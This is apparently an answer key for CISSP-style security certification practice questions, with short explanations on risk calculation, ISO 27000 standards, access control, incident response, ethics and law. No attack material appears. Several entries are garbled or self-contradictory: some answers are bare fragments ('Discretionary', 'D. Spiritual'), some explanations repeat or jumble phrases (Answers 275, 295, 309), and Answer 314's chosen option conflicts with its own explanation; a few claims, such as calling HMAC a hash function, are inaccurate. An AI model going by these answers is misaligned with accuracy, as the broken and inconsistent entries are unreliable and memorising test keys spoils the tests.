27. C. $48,000 is the correct answer. The annualized loss expectancy formula (SLE × ARO = ALE) is used to calculate the loss potential for one asset experiencing one threat in a 12-month period. The resulting ALE value helps to determine the amount that can be reasonably be spent in the protection of that asset. In this situation, the company should not spend over $48,000 on protecting this asset from the threat of fire. ALE values help organizations rank the severity level of the risks they face so they know which ones to deal with first and how much to spend on each.

Answer 177

28. D. The proper mapping for the ISO/IEC standards are as follows: * ISO/IEC 27001 ISMS requirements * ISO/IEC 27002 Code of practice for information security management * ISO/IEC 27003 Guideline for ISMS implementation * ISO/IEC 27004 Guideline for information security management measurement and metrics framework * ISO/IEC 27005 Guideline for information security risk management * ISO/IEC 27006 Guidance for bodies providing audit and certification of information security management systems

Answer 178

29. C. The best process improvement approaches provided in this list are Six Sigma and the Capability Maturity Model. The following outlines the definitions for all items in this question: * TOGAF Model and methodology for the development of enterprise architectures developed by The Open Group * ITIL Processes to allow for IT service management developed by the United Kingdom’s Office of Government Commerce * Six Sigma Business management strategy that can be used to carry out process improvement * Capability Maturity Model Integration (CMMI) Organizational development for process improvement developed by Carnegie Mellon

Answer 179

30. C. Mandatory vacation is an administrative detective control that allows for an organization to investigate an employee’s daily business activities to uncover any potential fraud that may be taking place. The employee should be forced to be away from the organization for a two-week period and another person put into that role. The idea is that the person who was rotated into that position may be able to detect suspicious activities

Answer 180

31. A. Separation of duties is an administrative control that is put into place to ensure that one person cannot carry out a critical task by himself. If a person were able to carry out a critical task alone, this could put the organization at risk. Collusion is when two or more people come together to carry out fraud. So if a task was split between two people, they would have to carry out collusion (working together) to complete that one task and carry out fraud.

Answer 181

32. D. Dual control is an administrative preventative control. It ensures that two people must carry out a task at the same time, as in two people having separate keys when opening the vault. It is not a detective control. Notice that the question asks what Todd is not doing. Remember that on the exam you need to choose the best answer.

Answer 182

33. B. While each answer is a good thing for Sam to carry out, the first thing that needs to be done is to ensure that the policies properly address data classification and protection requirements for the company. Policies provide direction, and all other documents (standards, procedures, guidelines) and security controls are derived from the policies and support them.

Answer 183

34. C. Data is one of the most critical assets to any organization. The value of the asset must be understood so that the organization knows which assets require the most protection. There are many components that go into calculating the value of an asset: cost of replacement, revenue generated from asset, amount adversaries would pay for the asset, cost that went into the development of the asset, productivity costs if asset was absent or destroyed, and liability costs of not properly protecting the asset. So the data owners need to be able to determine the value of the data to the organization for proper classification purposes.

Answer 184

35. A. The company has developed a data classification policy, which is an administrative control.

Answer 185

36. D. The operations staff needs to know what minimum level of security is required per system within the network. This minimum level of security is referred to as a baseline. Once a baseline is set per system, then the staff has something to compare the system against to know if changes have not taken place properly, which could make the system vulnerable.

Answer 186

37. D. Susan needs to illustrate these vulnerabilities (misconfigured systems) in the context of risk to her boss. This means she needs to identify the specific vulnerabilities, associate threats to those vulnerabilities, and calculate their risks. This will allow her boss to understand how critical these issues are and what type of action needs to take place

Answer 187

38. A. Standards need to be developed that outline proper configuration management processes and approved baseline configuration settings. Once these standards are developed and put into place, then employees can be trained on these issues and how to implement and maintain what is outlined in the standards. Systems can be tested against what is laid out in the standards, and systems can be monitored to detect if there are configurations that do not meet the requirements outlined in the standards. You will find that some CISSP questions seem subjective and their answers hard to pin down. Questions that ask what is “best” or “more likely” are common

Answer 188

Discretionary

Answer 189

Discretionary

Answer 190

1. Correct answer and explanation: C. The ARO is the number of attacks in a year.Incorrect answers and explanations: Answers A, B, and D are incorrect. The AV is $20,000. The EV is 40% and the monthly cost of the DoS service (used to calculate TCO) is $10,000.

Answer 191

2. Correct answer and explanation: D. The ALE is derived by first calculating the SLE, which is the AV, $20,000, multiplied by the EF, 40%. The SLE is $8000, which is multiplied by the ARO of 7 for an ALE of $56,000. Incorrect answers and explanations: Answers A, B, and C are incorrect. $20,000 is the AV, while $8000 is the SLE.

Answer 192

3. Correct answer and explanation: C. The TCO of the DoS mitigation service is higher than ALE of lost sales due to DoS attacks. This means it is less expensive to accept the risk of DoS attacks or to find a less expensive mitigation strategy.Incorrect answers and explanations: Answers A, B, and D are incorrect. The annual TCO is higher, not lower. $10,000 is the monthly TCO; you must calculate yearly TCO to compare with the ALE.

Answer 193

4. Correct answer and explanation: A. The canons are applied in order and “To protect society, the commonwealth, and the infrastructure” is the first canon, and is thus the most important of the four canons of The (ISC)2 Code of Ethics. Incorrect answers and explanations: Answers B, C, and D are incorrect. The canons of The (ISC)2 Code of Ethics are presented in order of importance. The second canon requires the security professional to act honorably, honestly, justly, responsibly, and legally. The third mandates that professionals provide diligent and competent service to principals. The final and therefore least important canon wants professionals to advance and protect the profession.

Answer 194

Answer: D. Privacy Explanation: The CIA triad consists of confidentiality, integrity, and availability. Privacy is an important security concept but not part of the CIA triad

Answer 195

Answer: D. Financial Explanation: Access control has three categories: physical, administrative, and technical. Financial is not a category of access control.

Answer 196

Answer: B. To reduce risks to an acceptable level Explanation: The primary goal of a security risk assessment is to identify and analyze risks and then develop strategies to reduce them to an acceptable level.

Answer 197

Answer: B. AES Explanation: AES is a symmetric key algorithm, meaning the same key is used for encryption and decryption. RSA, Diffie-Hellman, and ElGamal are examples of asymmetric key algorithms.

Answer 198

Answer: D. Sequential Explanation: There is no SDLC model called sequential. The most common SDLC models are Waterfall, Agile, and Spiral.

Answer 199

Answer: A. To prevent unauthorized access to a network Explanation: The primary purpose of a firewall is to prevent unauthorized access to a network by blocking traffic that does not meet specific criteria.

Answer 200

Answer: C. Firewalls Explanation: Firewalls are an example of technical security control, not physical security. Physical security controls include security cameras, biometric scanners, and fences.

Answer 201

Answer: D. Public-private key Explanation: There is no such thing as a public private key. Public key encryption uses a public and private key, while symmetric key encryption uses a session key.

Answer 202

Answer: B. Security awareness training Explanation: Security awareness training is a security control that falls under the security operations domain. It aims to educate employees about their responsibilities in maintaining the organization’s security posture and helps them recognize and respond to potential threats.Penetration testing is not a correct answer because it falls under the Security Assessment and Testing domain, which involves evaluating an organization’s security posture by simulating real-world attacks. Access control is not a correct answer because it falls under the Identity and Access Management (IAM) domain, which deals with controlling who has access to resources and ensuring that only authorized individuals can access those resources. Application security testing is not a correct answer because it falls under the Software Development security domain, which focuses on ensuring the security of applications throughout their development life cycle.

Answer 203

Answer: D. Penetration Explanation: Penetration is not a component of a security incident response plan. The three primary components of a security incident response plan are preparation, detection, and mitigation. Preparation involves developing policies, procedures, and controls to prevent security incidents from occurring. Detection consists of identifying and analyzing security incidents when they occur. Mitigation consists of responding to and containing the impact of security incidents and preventing similar incidents from occurring.

Answer 204

Answer: C. Intrusion detection system Explanation: Technical security controls use technology to prevent, detect, or respond to security threats. Examples include firewalls, antivirus software, and intrusion detection systems.

Answer 205

Answer: D. Something you want Explanation: The three common authentication factors are something you know (e.g., password), something you have (e.g., token), and something you are (e.g., biometric). Something you want is not a recognized authentication factor.

Answer 206

Answer: B. Vulnerability scanning Explanation: Vulnerability scanning is a security control under the security assessment and testing domain. It involves scanning a system for known vulnerabilities and weaknesses.

Answer 207

Answer: D. Access control list (ACL) Explanation: Access control lists (ACLs) are a common implementation of access control but are not themselves an access control model. The three common access control models are discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC).

Answer 208

Answer: A. High availability Explanation: A key consideration when designing asecure network architecture is ensuring the high availability of critical services and resources. While cost, administration, and bandwidth are also important, they are secondary to availability in the context of security.

Answer 209

Answer: A. To establish the minimum-securityrequirements for a system or application Explanation: A security baseline is a set of minimum-security requirements that a system or application must meet to be considered secure. It serves as a starting point for security configuration and helps ensure security controls are implemented consistently across the organization.

Answer 210

Answer: D. Proxy Explanation: Proxy is not a method of authentication. The three common methods of authentication are something you know (e.g.,password), something you have (e.g., token), and something you are (e.g., biometric). The certificate is a type of token-based authentication.

Answer 211

Answer: D. To ensure compliance with security policies and standards Explanation: A security audit systematically evaluates an organization’s security policies, standards, and procedures to ensure compliance with established security requirements

Answer 212

Answer: B. Security by design Explanation: Security by design is a key principle of secure software development that involves considering security requirements throughout the entire Software Development Life Cycle rather than as an afterthought.

Answer 213

Answer: D. Termination Explanation: Termination is not a key component of an incident response plan. The three primary components are preparation, detection and analysis, and containment, eradication, and recovery.

Answer 214

Answer: C. Two-factor authentication and D. Passwords Explanation: Non-repudiation controls prevent the denial of an action or transaction. Digital signatures and audit trails are examples of non-repudiation controls, as they prove a transaction’s origin and integrity. Two-factor authentication provides authentication and authorization but does not prevent repudiation. Passwords are not a non-repudiation control.

Answer 215

Answer: C. Background checks Explanation: Background checks are a type of administrative security control, not a technical security control. Technical security controls involve using technology to prevent, detect, or respond to security threats.

Answer 216

Answer: C. Network availability Explanation: Network availability is crucial when designing a secure network topology. The network must be designed to ensure that critical services and resources are available when needed while minimizing downtime and disruption in an attack or failure.

Answer 217

Answer: D. Secure coding Explanation: Secure coding is a key principle of secure software development that involves writing code free from security vulnerabilities and exploits. This helps prevent the introduction of security weaknesses into the software and reduces the risk of a successful attack.

Answer 218

Answer: C. Accountability Explanation: Accountability is not a type of access control but rather a concept related to responsibility and liability for actions taken. The three common types of access control are authentication, authorization, and audit/monitoring.

Answer 219

Answer: D. Improved disaster recovery capabilities Explanation: Cloud computing can improve disaster recovery by providing redundant infrastructure and data backups in multiple locations. While cloud providers may also offer enhanced physical security and other benefits, improved disaster recovery is a key benefit for protection.

Answer 220

Answer: D. Enforcing data encryption and access control policies Explanation: Enforcing data encryption and access control policies is a key consideration for secure Mobile Device Management. Mobile devices are highly portable and often contain sensitive data, making encryption and access control critical for protecting against unauthorized access or data loss.

Answer 221

Answer: B. Using long, complex passwords Explanation: Using long, complex passwords is a key principle of secure password management Requiring password changes too frequently can lead to weaker passwords while storing passwords in a centralized database or sharing passwords increases the risk of unauthorized access.

Answer 222

Answer: D. Hierarchical access control (HAC) Explanation: Hierarchical access control (HAC) is not a recognized access control model. The three common access control models are role-based access control (RBAC), mandatory access control (MAC), and discretionary access control (DAC).

Answer 223

Answer: C. Isolating critical systems and resources Explanation: Isolating critical systems and resources is a key consideration when designing secure network segmentation. Segmenting the network can help limit the impact of a security breach or failure, but it is important to ensure that critical systems and resources are properly isolated and protected.

Answer 224

Answer: C. Securing virtual machine images and snapshots Explanation: Securing virtual machine images and snapshots is a key consideration when designing secure virtualization environments. Virtual machines can be easily copied or cloned, potentially exposing sensitive data or allowing unauthorized access. Proper security measures must be taken to secure virtual machine images and snapshots.

Answer 225

Answer: B. Minimizing network complexity Explanation: Minimizing network complexity is a key principle of secure network design. Complex networks are more difficult to manage and secure and can increase the risk of security breaches or failures. Simplifying the network and reducing complexity can help improve security.

Answer 226

Answer: D. Social engineering vulnerability Explanation: Social engineering is a technique that manipulates people into divulging sensitive information or performing actions that compromise security. It is not a type of vulnerability. The three types of vulnerabilities listed are commonly found in software or systems.

Answer 227

Answer: C. Ensuring compliance with applicable regulations and standards Explanation: Ensuring compliance with applicable regulations and standards is a key consideration when designing secure cloud architecture. Cloud providers must comply with various regulations and standards, such as GDPR or HIPAA, depending on the industry and the data stored in the cloud.

Answer 228

Answer: C. Implementing secure coding practices Explanation: Implementing secure coding practices is a key principle of secure application development. Secure coding involves writing code free from security vulnerabilities and exploits and incorporating security considerations throughout the Software Development Life Cycle.

Answer 229

Answer: D. Enforcing strong encryption and access controls Explanation: Enforcing strong encryption and access controls is a key consideration when implementing secure remote access. Remote access can expose sensitive data and resources to unauthorized access, so it is important to use strong authentication mechanisms and enforce proper access controls

Answer 230

Answer: C. Applying consistent data classification criteria Explanation: Applying consistent data classification criteria is a key principle of secure data classification. Data classification involves categorizing data based on its sensitivity and value and applying appropriate security controls based on the classification. Consistency in classification criteria helps ensure that data is properly protected across the organization.

Answer 231

Answer: D. HMAC Explanation: HMAC (Hash-based Message Authentication Code) is a cryptographic hash function, not an encryption algorithm. The three common encryption algorithms listed are commonly used for encryption and decryption.

Answer 232

Answer: C. Conducting thorough post-incident analysis and review Explanation: Conducting thorough post-incident analysis and review is a key principle of secure incident response. Incident response involves detecting, analyzing, and responding to security incidents, and conducting a post-incident analysis and review helps identify areas for improvement and strengthen the organization’s security posture.

Answer 233

Answer: C. Securing data at rest and in transit Explanation: Securing data at rest and in transit is a key consideration when implementing secure data storage. Data must be protected against unauthorized access or disclosure, whether stored on disk or transmitted across the network. Encryption and access controls are commonly used to secure data at rest and in transit

Answer 234

Answer: D. Risk decisions should be based on the impact on the business. Explanation: Risk decisions should be made case by case, considering the unique context and potential impact on the business. A one-size-fits-all approach to risk management is not effective. Instead, an organization should evaluate each risk regarding its potential impact and decide the most appropriate risk response strategy: accept, avoid, transfer, or mitigate.

Answer 235

Answer: D. To facilitate appropriate levels of protection based on value or sensitivity. Explanation: Data classification is essential to an organization’s information security strategy. By classifying data, organizations can apply appropriate levels of protection to sensitive information and ensure that resources are allocated efficiently.

Answer 236

Answer: B. To control network traffic based on predetermined security rules Explanation: A firewall is a network security device that monitors incoming and outgoing network traffic and decides whether to allow or block specific traffic based on a defined set of security rules. It is a critical piece of a network security infrastructure and can help prevent unauthorized access to or from a network.

Answer 237

Answer: C. Integrating security throughout the life cycle, including design, development, and testing. Explanation: Security should be a key consideration throughout the entire software development life cycle, not just at the end. This approach, often called “security by design,” helps ensure that security is integrated into the software from the ground up and can help identify and mitigate vulnerabilities early in the development process.

Answer 238

Answer: C. Mandatory access control (MAC) Explanation: Mandatory access control (MAC) uses labels (often reflecting different sensitivity levels, such as confidential, secret, and top secret) to determine access. In a MAC model, users do not have the discretion to determine who has access to the information they own or control.

Answer 239

Answer: C. To ensure the continuation of business processes Explanation: The primary goal of a business continuity plan (BCP) is to ensure the continuation of business processes during and after a disruption. The BCP is a comprehensive plan to maintain or resume business during a disruption.

Answer 240

Answer: B. That the data has not been altered during transmission Explanation: In cryptography, “integrity” ensures that the data has not been altered during transmission. Alteration can be accidental, such as data corruption during transmission, or intentional, such as a malicious attack

Answer 241

Answer: B. Evaluate the effectiveness of security controls Explanation: The primary purpose of penetration testing is to evaluate the effectiveness of security controls by simulating an attack. By identifying vulnerabilities and testing security measures, organizations can better understand their security posture and make informed decisions about risk management.

Answer 242

Answer: B. Granting users the minimum access necessary to perform their job function Explanation: A key principle of Identity and Access Management is granting users the minimum access necessary to perform their job functions. This principle, known as the principle of least privilege, is critical for reducing the risk of unauthorized access or actions.

Answer 243

Answer: D. Authenticity Explanation: The CIA triad in information security stands for confidentiality, integrity, and availability. While authenticity is an important concept in information security, it is not a part of the CIA triad.

Answer 244

Answer: A. Granting users only the permissions they need to perform their job functions Explanation: The principle of least privilege is a computer security concept in which users are given the minimum access necessary to complete their job functions. This helps to reduce the potential damage caused by errors or malicious actions.

Answer 245

Answer: B. An attack that involves sending deceptive emails to trick individuals into revealing sensitive information

Answer 246

Answer: C. Intrusion detection system Explanation: In the context of information security, IDS stands for intrusion detection system. A device or software application monitors a network or systems for malicious activity or policy violations.

Answer 247

Answer: B. Technical Explanation: A biometric scanner is technical security control. Technical controls are often hardware or software tools, such as firewalls, encryption, and authentication mechanisms, like biometric scanners, designed to protect systems and data.

Answer 248

Answer: B. Impact, threat, vulnerability Explanation: Risk is typically composed of three components: threat (a potential cause of an incident that may result in harm), vulnerability (a weakness that can be exploited by a threat), and impact (the potential harm caused by a threat exploiting a vulnerability)

Answer 249

Answer: D. Risk acceptance Explanation: Risk acceptance is when an organization decides to acknowledge a risk but does not implement additional controls or measures to address it. The other options (avoidance, mitigation, and transfer) all involve taking some action to address the risk.

Answer 250

Answer: D. Prioritize personal gain over professional duties Explanation: The ISC2 Code of Ethics includes the principles of protecting society and the infrastructure; acting honorably, honestly, and legally; and providing diligent and competent service. Prioritizing personal gain over professional duties is contrary to the ethical principles outlined by ISC2.

Answer 251

Answer: A. Determining the most essential functions and processes of the organization Explanation: Identifying critical business functions involves determining the most essential functions and processes of the organization, which should be prioritized for recovery during an incident. This is a crucial first step in business continuity and disaster recovery planning. The other options are also part of the planning process, but they do not define what it means to “identify critical business functions.”

Answer 252

Answer: B. It relies on subjective judgments to rank risk. Explanation: A qualitative risk assessment uses subjective judgments and expert opinions to rank risks, often categorizing them as low, medium, or high. In contrast, a quantitative risk assessment uses numerical values and calculations to estimate risks.

Answer 253

Answer: C. Evaluating the potential impact on operations if the asset is compromised Explanation: The “business impact” asset valuation method involves evaluating the potential impact on the organization’s operations, reputation, or bottom line if the asset is compromised. The other options correspond to different asset valuation methods: “financial value,” “market value,” and “intangible value,” respectively.

Answer 254

Answer: D. Complexity Explanation: Effective risk communication and reporting should be clear, timely, and consistent. Complexity, particularly in the form of jargon and technical terms, can actually hinder effective communication and should be avoided when possible.

Answer 255

Answer: D. Implementing risk treatment plans Explanation: Regular risk monitoring and review involves tracking risk treatment progress, reviewing risk assessments, and analyzing incident reports. Implementing risk treatment plans is part of risk treatment, not monitoring and review.

Answer 256

Answer: C. Perform regular assessments of the organization’s adherence to relevant laws and regulations Explanation: Conducting compliance audits involves performing regular assessments to check if the organization is adhering to relevant laws and regulations. This process helps to identify any deviations or noncompliance issues, which can then be addressed to avoid legal penalties, reputational damage, and other negative consequences. Options A,B, and D are all important components of a compliance program but do not accurately define the term “conduct compliance audits.

Answer 257

Answer: D. Risk expansion Explanation: Risk expansion is not a recognized risk treatment option. The commonly accepted risk treatment options are risk acceptance, risk avoidance, risk mitigation, and risk transfer.

Answer 258

Answer: B. Factor Analysis of Information Risk Explanation: FAIR stands for Factor Analysis of Information Risk. It offers a quantitative approach to risk management, enabling organizations to measure and prioritize risks using financial terms.

Answer 259

Answer: D. Transferring the risk to a third party Explanation: Risk transfer involves shifting the risk to a third party, such as an insurance company or a service provider.

Answer 260

Answer: D. Emotional controls Explanation: Risk mitigation strategies involve technical, administrative, and physical controls. Emotional controls are not a recognized type of control in risk mitigation.

Answer 261

Answer: D. Assess operational efficiency Explanation: The risk assessment process involves identifying assets, threats, and vulnerabilities, assessing the potential impact and likelihood of each threat-vulnerability pair, and prioritizing risks. Assessing operational efficiency is not part of this process.

Answer 262

Answer: B. To prepare for, respond to, and recover rom disruptions or disasters Explanation: The primary purpose of business continuity and disaster recovery planning is to prepare for, respond to, and recover from disruptions or disasters. While prevention is ideal, it is not always possible, hence the need for preparation, response, and recovery plans.

Answer 263

Answer: D. Intangible value Explanation: Intangible value considers the asset’s contribution to the organization’s intellectual property, customer trust, or competitive advantage. These aspects may not have a direct monetary value but are critical to the organization’s success.

Answer 264

Answer: B. A set of fundamental principles Explanation: The “canons” in the ISC2 Code of Ethics refer to a set of fundamental principles that guide the ethical and professional behavior of information security professionals.

Answer 265

Answer: B. Risk acceptance tolerates the risk, while risk avoidance eliminates the risk. Explanation: Risk acceptance involves acknowledging and deciding to tolerate the risk, whereas risk avoidance involves eliminating the risk by discontinuing the activity or process that causes it.

Answer 266

Answer: B. Risk in product design and marketing Explanation: The COSO ERM framework includes principles and guidance focusing on risk governance and culture, strategy and objective setting, and risk in execution and performance. Risk in product design and marketing, while important, is not specifically mentioned in the framework.

Answer 267

Answer: C. To use numerical values to estimate risks Explanation: Quantitative risk assessment uses numerical values and calculations to estimate potential risks, often in terms of potential financial impact.

Answer 268

Answer: D. Controls Explanation: Controls are not a component of risk but are measures taken to mitigate risk. The primary components of risk are threats, vulnerabilities, and potential impacts.

Answer 269

Answer: B. Implementing a risk management process for federal information systems Explanation: The NIST SP 800-37 framework primarily provides guidelines for implementing a risk management process for federal information systems.

Answer 270

Answer: D. Presenting information in a clear and understandable manner Explanation: Effective risk communication and reporting involve presenting risk-related information clearly, timely, and concisely. This allows stakeholders at all levels, regardless of their technical expertise, to comprehend the risks and make informed decisions. Option A is incorrect as complex technical terms can make the information harder to understand, especially for nontechnical stakeholders. Option B is also incorrect as frequent communication of risk-related information is crucial to keep all stakeholders informed and aware of the current risk landscape.

Answer 271

Answer: B. It allows risk considerations to be part of decision-making processes and overall business strategy. Explanation: Integrating risk management into an organization’s business processes ensures that risk considerations are incorporated into all aspects of the business, including decision-making processes, resource allocation, and strategic planning. This approach promotes a risk-aware culture and allows the organization to proactively manage risks rather than reactively responding to them

Answer 272

Answer: B. The organization acknowledges the risk and decides to tolerate it. Explanation: Risk acceptance involves acknowledging risk and deciding to tolerate it without implementing additional controls. This typically occurs when the cost of mitigating the risk exceeds the potential benefit or when the risk is deemed to have a low impact on the organization.

Answer 273

Answer: A. To estimate the direct monetary value of an asset Explanation: Asset valuation involves assigning a value to an organization’s assets, such as hardware, software, data, or personnel. This value can be based on various factors, including the cost of purchasing, maintaining, or replacing the asset; its potential impact on the organization’s operations or reputation; its market value; or its intangible value.

Answer 274

Answer: C. Tailoring the content and format of risk reports to the needs of the intended audience Explanation: Effective risk communication and reporting should be tailored to the needs and preferences of the intended audience. This includes presenting information in a clear, concise, and understandable manner; communicating risks and risk management activities regularly; and maintaining consistency in risk communication and reporting across the organization

Answer 275

Answer: B. To ensure that the organization can continue operating during and after a disruption or disaster Explanation: Business continuity and disaster recovery planning aim to ensure that an organization can continue its critical operations during and after a disruption or disaster This involves identifying disruption or disaster. This involves identifying critical business functions, assessing potential disruptions, developing recovery strategies, implementing recovery plans, and regularly testing and maintaining these plans.

Answer 276

Answer: B. To provide diligent and competent service to principals Explanation: According to the ISC2 Code of Ethics, a primary ethical obligation of a security professional is to provide diligent and competent service to principals. This means that security professionals should strive to serve their employers, clients, and other stakeholders with the highest level of professionalism.

Answer 277

D. Spiritual

Answer 278

Answer: C. Tracking risk treatment progress Explanation: Tracking risk treatment progress is a key component of the risk monitoring and review process. Other elements include reviewing risk assessments, analyzing incident reports, and evaluating the overall effectiveness of the risk management program

Answer 279

Answer: B. It ensures that risk considerations are part of decision-making processes. Explanation: Integrating risk management into an organization’s business processes helps ensure that risk considerations are part of decision-making processes, resource allocation, and overall business strategy. This can help the organization make better informed decisions and mitigate potential risks more effectively.

Answer 280

Answer: C. Ignoring compliance audits Explanation: Ignoring compliance audits is not a part of compliance and regulatory considerations. Regular audits are important for assessing the organization’s compliance with relevant laws and regulations and identifying potential gaps or areas for improvement.

Answer 281

Answer: D. Risk transfer Explanation: Risk transfer is a risk treatment option that involves transferring the risk to a third party, such as an insurance company or a service provider.

Answer 282

Answer: C. The asset’s contribution to the organization’s intellectual property or customer trust Explanation: The intangible value of an asset refers to nonmonetary aspects such as its contribution to the organization’s intellectual property, customer trust, or competitive advantage.

Answer 283

Answer: B. Engage a financial or accounting expert to determine the asset’s profit returns Explanation: The value of an intangible asset is best determined by assessing its economic benefits, such as the profits it generates. A financial or accounting professional would be most equipped to calculate this

Answer 284

Answer: A. It can be executed easily and by individuals with basic knowledge of the risk assessment process. Explanation: Qualitative risk assessment is characterized by its simplicity and the ability to be performed by individuals with a basic understanding of the process. It does not rely heavily on specific metrics or calculations; rather, it uses descriptions or categories to assess and prioritize risks.

Answer 285

Answer: C. By multiplying the asset value and exposure factor Explanation: Single Loss Expectancy (SLE) is calculated by multiplying the asset value (how much the asset is worth) by the exposure factor (the proportion of the asset that is lost in the event of an incident).

Answer 286

Answer: D. Organizational culture, budget, and resource capabilities Explanation: The type of risk assessment to be performed in an organization is influenced by various factors. These include the organizational culture (which can determine the acceptance and understanding of the assessment process), the available budget (which can limit or extend the scope and depth of the assessment), and resource capabilities (which can impact the ability to perform certain types of assessments). While the probability of exposure is a factor in risk assessment, it is part of the assessment process itself rather than a determining factor in the type of risk assessment to be conducted.

Answer 287

Answer: B. Security roles and responsibilities of staff Explanation: Security awareness training typically covers the roles and responsibilities of staff regarding security. It aims to equip them with the knowledge they need to recognize and respond appropriately to security threats.

Answer 288

Answer: D. To protect the organization if a user’s behavior violates the policy Explanation: While all options may have some relevance, a signed user acknowledgment of the corporate security policy primarily helps protect the organization if a user’s behavior violates the policy. It serves as documented evidence that the user was aware of the policy and the associated consequences of noncompliance.

Answer 289

Answer: B. Reduces risk to an acceptable level Explanation: Effective security management focuses on mitigating risk to a level that is acceptableto the organization, balancing the cost of risk mitigation with the potential impact of security incidents. While cost control, prioritization for new products, and timely patching are important, they are part of a broader strategy aimed at risk reduction.

Answer 290

Answer: D. Denial-of-service attacks, fires, floods, hurricanes, and unreadable backup tapes Explanation: The principle of availability in information security is concerned with ensuring that authorized users have access to data and resources when needed. This involves protection against a variety of threats including denial-of-service attacks; natural disasters like fires, floods, and hurricanes; and technical issues such as unreadable backup tapes.

Answer 291

Answer: C. CFO, CEO, or Chief Information Officer Explanation: To avoid bias and ensure independence, a security officer could report directly to top-level management such as the Chief Financial Officer (CFO), Chief Executive Officer (CEO), or the Chief Information Officer (CIO). This arrangement helps to ensure that security concerns are addressed at the highest level of decision-making.

Answer 292

Answer: D. To deploy new security technology Explanation: Tactical security plans are typically used to guide the implementation of specific security measures, such as the deployment of new security technologies. These plans have a shorter time horizon than strategic security plans and are more detailed, focusing on the practical aspects of implementing security measures.

Answer 293

Answer: A. Everyone Explanation: While specific roles like the security officer, senior management, and data owners have key responsibilities, implementing information security is a shared responsibility. Everyone in an organization has a part to play in maintaining security, from following established policies to reporting potential security incidents.

Answer 294

Answer: D. Implementation Explanation: Implementing security measures often involves significant costs, including the purchase of security hardware or software, hiring or training staff, and potential disruptions to business operations. It’s generally more cost-effective to consider security early in the design phase, where potential issues can be addressed before they become expensive problems during implementation.

Answer 295

Answer: D. Directive words such as shall, must, or will a defined policy development process and is will, a defined policy development process, and is short in length Explanation: A security policy that remains meaningful over time is one that is clear and concise, has a defined policy development and review process, and uses directive words to clearly communicate the requirements. It doesn’t necessarily need to contain detailed technical specifications, as these may change over time and could make the policy less adaptable and more difficult to maintain.

Answer 296

Answer: B. Collaborating with finance or accounting professionals to ascertain the profit returned by the asset Explanation: The value of an intangible asset is often best determined by its ability to generate profit. Therefore, working with finance or accounting professionals to ascertain the profit returned by the asset is typically the most effective approach.

Answer 297

Answer: B. Separation of duties Explanation: The separation of duties principle is designed to prevent errors and fraud that might be possible when only one person is in control of all parts of a process. Here, allowing one person to both add vendors and make payments could lead to fraudulent transactions. Hence, this scenario is a violation of the separation of duties principle.

Answer 298

Answer: A. Job rotation Explanation: Collusion is the act of collaborating fraudulently within an organization to deceive or defraud. Job rotation, which involves moving employees between different roles, is a good way to prevent collusion because it reduces the opportunity for long-term manipulation in any single position.

Answer 299

Answer: B. Data owners Explanation: Data owners, the individuals or entities responsible for the data’s security and use, are best suited to make decisions about data access. They understand the data’s sensitivity and the potential risks of unauthorized access. While other stakeholders may have input, the ultimate decision should lie with the data owner.

Answer 300

Answer: C. Insiders Explanation: Although cybercrime can come from various sources, the greatest risk often comes from insiders. These are individuals who have legitimate access to the system and can misuse it for harmful activities. Insider threats are difficult to detect and can cause substantial damage.

Answer 301

Answer: C. Activity associated with computer crime is truly international. Explanation: The international nature of computer crime is a major hindrance to fighting it. Jurisdictional issues, differences in laws across countries, and the sheer scope of the Internet make it challenging to investigate and prosecute cybercrimes effectively.

Answer 302

Answer: A. Law Explanation: Computer forensics is a multidisciplinary field that combines computer science, information technology, and engineering with law. The goal is to gather and analyze data in a way that is legally admissible.

Answer 303

Answer: D. Locard’s principle of exchange Explanation: Locard’s exchange principle states that the perpetrator of a crime will bring something into the crime scene and leave with something from it and that both can be used as forensic evidence. This principle is applicable to cybercrimes, where digital traces can be left behind

Answer 304

Answer: B. Completeness, authenticity, and admissibility Explanation: The five cardinal rules of evidence include completeness, authenticity, admissibility, accuracy, and reasonableness. Hence, option B is correct as it contains three of these principles.

Answer 305

Answer: B. Prosecution Explanation: While prosecution may be a result of an incident response, it is not a phase in itself. The typical phases of incident response include preparation, identification, containment, eradication, recovery, and lessons learned/documentation.

Answer 306

Answer: B. Civil law Explanation: Civil law, also known as Roman law, is primarily based on written codes, statutes, and legal principles developed by legal scholars and academics. It emphasizes abstract concepts of law.

Answer 307

Answer: C. Copyright Explanation: Copyright law protects the expression of an idea in a tangible medium, such as a book, song, or software program, rather than the idea itself.

Answer 308

Answer: A. Trademark Explanation: Trademarks protect brand names, logos, and other identifiers that signify the source of goods or services. The value of a trademark lies in the goodwill and brand recognition that a merchant or vendor builds in its products or services.

Answer 309

Answer: D. Freeware, commercial, and academic Explanation: These are all types of software licensing. Freeware is software that is available free of charge. Commercial software is typically sold for profit Academic licenses are special types of software profit. Academic licenses are special types of software licenses designed for educational institutions. These licenses are often offered at a discounted rate and may come with specific terms and conditions that restrict usage to educational purposes only.

Answer 310

Answer: A. Privacy Explanation: Privacy deals with the rights and obligations of individuals and organizations with respect to the collection, use, retention, and disclosure of personal information.

Answer 311

Answer: C. Detection, identification, notification Explanation: The initial steps of triage in incident response typically include detection (discovering the incident), identification (understanding the nature of the incident), and notification (informing relevant parties about the incident).

Answer 312

Answer: A. Comparing hash totals to the original source Explanation: The integrity of a forensic bit stream image is typically verified by comparing the hash of the image to the hash of the original source. If the hashes match, it verifies that the image is an exact replica of the original.

Answer 313

Answer: D. Have the minimum possible level of contamination Explanation: The aim should always be to minimize contamination of the crime scene to maintain the integrity of the digital evidence. This aids in its admissibility and reliability in a court of law.

Answer 314

Answer: A. All regulatory and compliance requirements must be transferred to the provider. Explanation: The responsibility for regulatory and compliance requirements lies with the organization, but when outsourcing IT systems these requirements but when outsourcing IT systems, these requirements should be clearly communicated and agreed upon with the provider.

Answer 315

Answer: C. Based on the order of the canons Explanation: If a conflict arises between the canons in the ISC2 Code of Ethics, they are resolved by giving precedence to the canon that appears earlier in the list.

Answer 316

Answer: C. Federal Information Security Management Act (FISMA) Explanation: The FISMA requires federal agencies to develop, document, and implement an agency-wide program to provide information security for the information systems that support its operations and assets.

Answer 317

Answer: C. Data localization Explanation: Data localization is not a principle stated in GDPR. GDPR principles include lawfulness, fairness, transparency, purpose limitation, data minimization, accuracy, storage limitation, integrity and confidentiality, and accountability.

Answer 318

Answer: A. HIPAA Security Rule Explanation: The HIPAA Security Rule specifically focuses on the protection of electronic protected health information (ePHI).

Answer 319

